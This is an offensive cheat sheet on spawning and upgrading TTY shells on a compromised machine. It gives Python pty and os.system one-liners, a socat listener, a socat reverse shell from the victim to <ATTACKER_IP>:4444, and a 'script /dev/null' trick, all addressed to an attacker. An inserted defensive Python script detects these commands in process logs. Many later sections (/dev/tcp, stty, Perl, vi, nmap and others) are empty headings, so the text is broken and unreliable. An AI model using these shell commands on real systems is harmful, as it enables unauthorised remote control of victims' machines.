Spawn TTY Shells

Python Methods

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

You can also use:

python -c 'import os; os.system("/bin/bash")'

Socat Methods (from attacker and victim)

On attacker (listener):

socat file:`tty`,raw,echo=0 tcp-listen:4444

On victim (reverse shell):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ATTACKER_IP>:4444

Script Method (if available on the system)

script /dev/null -c bash
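Seen from the detection side, the Python, socat and script commands above leave distinctive process command lines. The following is an added example, not part of the original page: it classifies process-exec events against those three patterns. The event fields, rule names, severity heuristic and sample events are assumptions constructed for illustration.

```python
import os
import re
import shlex

# Constructed process-exec events (not from the page); "tty" is as auditd reports it.
SAMPLE_EVENTS = [
    {"pid": 4101, "tty": "(none)", "cmd": "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"},
    {"pid": 4102, "tty": "(none)", "cmd": "python -c 'import os; os.system(\"/bin/bash\")'"},
    {"pid": 4103, "tty": "(none)", "cmd": "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.0.2.10:4444"},
    {"pid": 4104, "tty": "pts0", "cmd": "script /dev/null -c bash"},
    {"pid": 4105, "tty": "pts1", "cmd": "python3 manage.py runserver"},
    {"pid": 4106, "tty": "pts1", "cmd": "script session.log"},
    {"pid": 4107, "tty": "(none)", "cmd": "socat tcp-listen:8080,fork tcp:10.0.0.5:80"},
]

def classify(cmdline):
    """Return the names of the rules matched by one process command line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        argv = cmdline.split()
    if not argv:
        return []
    exe, rest, hits = os.path.basename(argv[0]), " ".join(argv[1:]), []
    if re.fullmatch(r"python[\d.]*", exe) and "-c" in argv[1:]:
        if re.search(r"\bpty\.spawn\s*\(", rest):
            hits.append("python-pty-spawn")
        if re.search(r"\bos\.system\s*\(\s*['\"][^'\"]*\b(?:ba|da|z)?sh\b", rest):
            hits.append("python-os-system-shell")
    # socat is flagged only when an exec: address is combined with the pty option
    if exe == "socat" and re.search(r"\bexec:", rest, re.I) and re.search(r"[,\s]pty\b", rest, re.I):
        hits.append("socat-exec-pty")
    # script(1) writing its typescript to /dev/null
    if exe == "script" and "/dev/null" in argv[1:]:
        hits.append("script-devnull-typescript")
    return hits

def scan(events):
    """Return (pid, rules, severity); no controlling TTY raises severity (heuristic)."""
    alerts = []
    for ev in events:
        hits = classify(ev["cmd"])
        if hits:
            alerts.append((ev["pid"], hits, "high" if ev["tty"] == "(none)" else "medium"))
    return alerts

if __name__ == "__main__":
    print(*scan(SAMPLE_EVENTS), sep="\n")
```

The three benign events (a Django dev server, a normal script recording, a socat port forward) produce no alert, which is the false-positive boundary these rules are meant to hold.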

Regaining Full Terminal Control

  1. Suspend with Ctrl + Z

  2. On the attacker host:

Ensuring Terminal Configuration

Adjusting Window Size (prevents errors when using programs like nano, htop, etc.)

  1. On the attacker host:

  2. On the remote shell:

/dev/tcp and Bash Method (interactive reverse shell)

Once connected, you can upgrade the shell with stty (explained below).

Shell Upgrade with System Commands (stty and export)

Once you use any of the above methods (like python -c 'pty.spawn(...)'), you can further improve it with:

Then, type:

With Perl

Or with pseudo-terminal:

With Java

If Runtime.exec() is accessible:

(Generally not very useful manually, but useful in Java app exploitation).

With Lua

With Awk

With Tcl

With vi or vim (command mode)

Or:

With nmap (if it has scripting with --interactive)

With Docker / Chroot / chsh if you have permissions

Or if you can change your shell:

Useful Tips

If you have a shell without colors or history, export:

To check if a TTY is assigned:
